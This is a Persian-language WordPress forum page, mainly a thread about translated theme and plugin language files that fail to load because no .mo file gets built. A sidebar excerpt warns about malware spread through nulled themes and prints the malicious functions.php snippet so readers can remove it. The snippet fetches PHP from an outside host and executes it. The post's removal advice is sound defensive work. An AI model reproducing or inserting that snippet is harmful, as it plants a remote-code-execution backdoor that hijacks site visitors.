• اطلاعیه ها

• Morteza

باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
loversgod

مشکل در فارسی سازی

8 پست در این موضوع قرار دارد

با سلام

من هر پوسته یا حتی افزونه ای رو که با poedit فارسی میکنم توی وردپرس برام فارسیش نمیکنه.یعنی پوسته یا افزونه ای دارم که خودش فایل po داره، من ترجمه میکنم فایل رو و به اسم پوسته با پسوند fa_IR ذخیره میکنم اما وردپرس باز هم همون زبون اصلی رو نشون میده.کسی میدونه مشکل کجاست؟ هم رو لوکال تست کردم هم رو نت

0

به اشتراک گذاری این پست

لینک به پست

سلام

2 تا مشکل میتونه باشه

اول اینکه در فایل های پوسته یا افزونه آدرس فایل زبان وجود داره که باید تغییر بدید

دوم اینکه نسخه وردپرس شما نسخه اصلی یعنی انگلیسی هستش که در این صورت فارسی رو لود نمیکنه

2

به اشتراک گذاری این پست

لینک به پست

ارسال شده در (ویرایش شده)

وردپرس من فارسی نسخه 3.5.1 هستش.

اولی رو هم متوجه نمیشم، خود وردپرس با توجه به نسخه وردپرس فراخوانی میکنه دیگه.فقط با یه پوسته یا افزونه هم این مشکل رو ندارم.هرچیزی رو که کار میکنم همینه.قبلا اینطور نبود.الان نمیدونم مشکل چیه.فکر کردم شاید مال نسخه وردپرس باشه ام ظاهرا فقط من این مشکل رو دارم.اگه بخواید میتونم یه پوسته یا افزونه براتون بفرستم

---

البته یه مشکلی هم دارما! فایل .mo ساخته نمیشه.خودم دستی میسازمش،با کپی کردن و تغییر نام فایل زبان اصلی .mo

ویرایش شده در توسط loversgod
0

به اشتراک گذاری این پست

لینک به پست

وردپرس من فارسی نسخه 3.5.1 هستش.

اولی رو هم متوجه نمیشم، خود وردپرس با توجه به نسخه وردپرس فراخوانی میکنه دیگه.فقط با یه پوسته یا افزونه هم این مشکل رو ندارم.هرچیزی رو که کار میکنم همینه.قبلا اینطور نبود.الان نمیدونم مشکل چیه.فکر کردم شاید مال نسخه وردپرس باشه ام ظاهرا فقط من این مشکل رو دارم.اگه بخواید میتونم یه پوسته یا افزونه براتون بفرستم

---

در بعضی از پوسته ها یا افزونه ها فایل زبانت فراخوانی میشه به این شکا مثلن :

load_theme_textdomain( 'esme ghaleb', TEMPLATEPATH . '/languages' );

یا به صورت های دیگه

-------------------------

البته یه مشکلی هم دارما! فایل .mo ساخته نمیشه.خودم دستی میسازمش،با کپی کردن و تغییر نام فایل زبان اصلی .mo

خو مشکلت همینه فایل mo. باید خودش از روی فارسی ساخته بشه

اونی که تو تغییر میدی زبان انگلیسی رو فراخوانی میکنه

3

به اشتراک گذاری این پست

لینک به پست

فراخوانیش درسته ، چون به زبونای دیگه کار میکنه.

برای .mo چیکار کنم خب؟ خودش باید یسازه اما نمیسازه.آخرین نسخه po edit رو هم دارم :(

0

به اشتراک گذاری این پست

لینک به پست

فایل زبانت رو بزار اینجا تا برات یک نسخه mo. بسازم

0

به اشتراک گذاری این پست

لینک به پست

آخه یک دوتا نیست که. نمیدونین مشکل از چی میتونه باشه؟ ممکنه از ویندوزم باشه؟

0

به اشتراک گذاری این پست

لینک به پست

آخه یک دوتا نیست که. نمیدونین مشکل از چی میتونه باشه؟ ممکنه از ویندوزم باشه؟

خب منم برای همین گفتم فایل رو بده تا ببینم برای منم مشکل داره یا میسازه

اگر ساخت یعنی مشکل از سیستمته و اگر نساخت یعنی از خودِ فایل هست

2

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط yaali
      بنام خدا
      :::لینک دانلود قالب فراسر:::
      دانلود قالب  
      خیلی وقت هست که به دنبال یک قالب وردپرسی ای بودم که جدا از ساده بودن، بتوانم با آن کد لایسنس و چیزایی از این دست بفروشم. علاوه بر اون کد فروخته شده بلافاصله به شماره موبایل مشتری هم پیامک بشه.
      قالبها و افزونه های زیادی ادعا داشتند که می توانند این کار را انجام دهند؛ اما در واقع هیچکدام کامل نبودند و پاسخی برای نیاز صاحبان فروشگاه نداشتند.
      بالاخره بر آن شدیم تا یه قالب ساده و در عین حال سریع و کارآمد برای این کار آماده کنیم. بعد از فراز و نشیب های بسیار، الان در خدمت شما هستیم با معرفی قالب فراسر.
      قالب فراسر یک قالب وردپرس هست که با اون میشه کارای زیادی رو انجام داد. یه نمونه ی معروف از اون فروش کارت شارژ هست. از طرف دیگه میشه با اون کد لایسنس هم فروخت. یعنی یه سایت فروش لایسنس آنتی ویروس داشت.
      با قالب فراسر می تونید هر نوع خدمتی که بر اساس کد و یا متن باشه انجام دهید. مثل فروش اپل آیدی و یا فروش یه جمله عاشقانه به طوری که هر جمله در یک سطر باشه و آپلود بشه و ...
      تصاویری از قالب فراسر رو می بینید:

این قالب توسط قلم سافت کدنویسی و آماده شده است و زحمت فارسی سازی اون رو بچه های همیاروردپرس کشیدن که به نشانه ی تشکر، متن پایین وبسایت حفظ شده است.
      هنگامی که بر روی هر کدام از دکمه های پرداخت کلیک کنید؛ با صفحه ی زیر منتقل می شوید:

این تصویر در واقع سبد خرید شماست. این صفحه به صورت خودکار به صفحه پرداخت منتقل می شود. انتقال خودکار اختیاری است که می توانید آن را از این صفحه حذف نمایید.
      در ادامه کاربر به صفحه زیر هدایت می شود. در این صفحه با وارد کردن تنها شماره موبایل خود می تواند خرید را انجام دهد. وارد کردن پست الکترونیکی اجباری نیست.

بعد از وارد کردن اطلاعات و پرداخت، بلافاصله کد مدنظر، به شماره شما پیامک می گردد. این قالب بر اساس پنل پیامکی sms.ir نوشته شده است. بزودی پنل های پیامکی  دیگر نیز به این قالب اضافه خواهند شد.

اگر شما هم مدتهاست که به دنبال چنین قالبی هستید می توانید هم اکنون با کلیک بر روی متن آن را دانلود کنید

• توسط نگار صادقی
      سلام وقت همگی بخیر.
      دوستان قالب 2017 پیشفرض وردپرس قالب خوبیه؟
      سئوش خوبه؟
      کدنویسی بهینه شده شده است؟
      ممنونم

• توسط shamea
      قالب سایتم درست بود یهوریخت بهم
      هیچ چیزم نصب نکردم هیچ کاریشم نکردم
      ادرسش اینه
      http://diacoshop.ir/
      اون قسمت های بالاش اسلایدبار بود هرکت میکرد الان ثابت شده حرکت نمیکنه
      مثه این بود:
      https://hamyarwp.com/preview/store/
      این دموشه